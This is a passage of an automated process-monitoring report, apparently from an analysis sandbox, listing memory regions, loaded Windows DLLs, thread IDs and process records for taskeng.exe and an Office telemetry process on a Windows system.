end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3652 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3653 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3654 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3655 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3656 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3657 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3658 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3659 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3660 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3661 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3662 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3663 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3664 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3665 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3666 start_va = 0x7fef5d00000 end_va = 0x7fef5d25fff entry_point = 0x7fef5d00000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3667 start_va = 0x7fee1830000 end_va = 0x7fee187bfff entry_point = 0x7fee1830000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3668 start_va = 0x7fee2ad0000 end_va = 0x7fee2cc9fff entry_point = 0x7fee2ad0000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 3669 start_va = 0x7fefbee0000 end_va = 0x7fefbef0fff entry_point = 0x7fefbee0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3670 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3671 start_va = 0x750a0000 end_va = 0x750a2fff entry_point = 0x750a0000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 3672 start_va = 0x7fef3160000 end_va = 0x7fef3167fff entry_point = 0x7fef3160000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 3673 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3674 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3675 start_va = 0x1b0000 end_va = 0x1b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3676 start_va = 0x1c0000 end_va = 0x1c4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3677 start_va = 0x11a0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 3678 start_va = 0x1520000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 3679 start_va = 0x1680000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 3680 start_va = 0x7fefbd80000 end_va = 0x7fefbd94fff entry_point = 0x7fefbd80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3681 start_va = 0x7fefbda0000 end_va = 0x7fefbdabfff entry_point = 0x7fefbda0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3682 start_va = 0x7fefbdb0000 end_va = 0x7fefbdc5fff entry_point = 0x7fefbdb0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3683 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3684 start_va = 0x7fefd980000 end_va = 0x7fefd9a2fff entry_point = 0x7fefd980000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3685 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3686 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3687 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3688 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3689 start_va = 0x7fefbd60000 end_va = 0x7fefbd73fff entry_point = 0x7fefbd60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3690 start_va = 0x7fefd270000 end_va = 0x7fefd29ffff entry_point = 0x7fefd270000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3691 start_va = 0x7fef3140000 end_va = 0x7fef3151fff entry_point = 0x7fef3140000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3692 start_va = 0x7fef3130000 end_va = 0x7fef3139fff entry_point = 0x7fef3130000 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 3693 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3694 start_va = 0x1700000 end_va = 0x1a42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001700000" filename = "" Region: id = 3695 start_va = 0x7fef3100000 end_va = 0x7fef312bfff entry_point = 0x7fef3100000 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 3696 start_va = 0x7fef9bc0000 end_va = 0x7fef9bcefff entry_point = 0x7fef9bc0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3697 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3698 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Thread: id = 168 os_tid = 0xb34 Thread: id = 169 os_tid = 0xb20 Thread: id = 170 os_tid = 0xaf8 Thread: id = 171 os_tid = 0x7ec Thread: id = 172 os_tid = 0x7c0 Thread: id = 173 os_tid = 0xab8 Thread: id = 174 os_tid = 0xac8 Thread: id = 175 os_tid = 0xb50 Thread: id = 176 os_tid = 0x6c8 Thread: id = 363 os_tid = 0xbb4 Process: id = "27" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x254ca000" os_pid = "0x638" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "taskeng.exe {16AB37ED-5665-4BC3-A477-887CA61493A7} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\\aETAdzjz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3774 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3775 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3776 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3777 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3778 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3779 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3780 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3781 start_va = 0xff2b0000 end_va = 0xff323fff entry_point = 0xff2b0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 3782 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3783 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3784 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3785 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3786 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3787 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3788 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3789 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3790 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3791 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3792 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3793 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3794 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 3795 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3796 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3797 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3798 start_va = 0x410000 end_va = 0x597fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3799 start_va = 0x5a0000 end_va = 0x720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3800 start_va = 0x730000 end_va = 0x1b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3801 start_va = 0x1b30000 end_va = 0x1f22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b30000" filename = "" Region: id = 3802 start_va = 0x1f90000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 3803 start_va = 0x2010000 end_va = 0x210ffff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 3804 start_va = 0x2110000 end_va = 0x218ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 3805 start_va = 0x21b0000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 3806 start_va = 0x22c0000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 3807 start_va = 0x2470000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 3808 start_va = 0x24f0000 end_va = 0x27befff entry_point = 0x24f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3809 start_va = 0x2810000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 3810 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3811 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3812 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3813 start_va = 0x7fef8120000 end_va = 0x7fef8128fff entry_point = 0x7fef8120000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 3814 start_va = 0x7fef9440000 end_va = 0x7fef9449fff entry_point = 0x7fef9440000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3815 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3816 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3817 start_va = 0x7fefd6b0000 end_va = 0x7fefd71cfff entry_point = 0x7fefd6b0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3818 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3819 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3820 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3821 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3822 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3823 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3824 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3825 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3826 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3827 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3828 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3829 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3830 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3831 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3832 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3833 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3834 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3835 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3836 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3837 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3838 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3839 start_va = 0x2340000 end_va = 0x241efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 3840 start_va = 0x29b0000 end_va = 0x2a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3841 start_va = 0x2a80000 end_va = 0x2afffff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 3842 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3843 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3844 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3845 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Thread: id = 183 os_tid = 0x634 Thread: id = 184 os_tid = 0x310 Thread: id = 185 os_tid = 0x4bc Thread: id = 186 os_tid = 0x6bc Thread: id = 187 os_tid = 0x5dc Thread: id = 188 os_tid = 0x3c0 Thread: id = 189 os_tid = 0x4f8 Thread: id = 190 os_tid = 0x774 Process: id = "28" image_name = "msoia.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\msoia.exe" page_root = "0x6b315000" os_pid = "0x254" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x638" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\" scan upload mininterval:2880" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3846 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3847 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3848 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3849 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3850 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3851 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3852 start_va = 0x13f830000 end_va = 0x13fb71fff entry_point = 0x13f830000 region_type = mapped_file name = "msoia.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoia.exe") Region: id = 3853 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3854 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3855 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3856 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3955 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3956 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3957 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3958 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3959 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3960 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3961 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3962 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 3963 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 3964 start_va = 0x610000 end_va = 0x790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3965 start_va = 0x7a0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 3966 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3967 start_va = 0x77b20000 end_va = 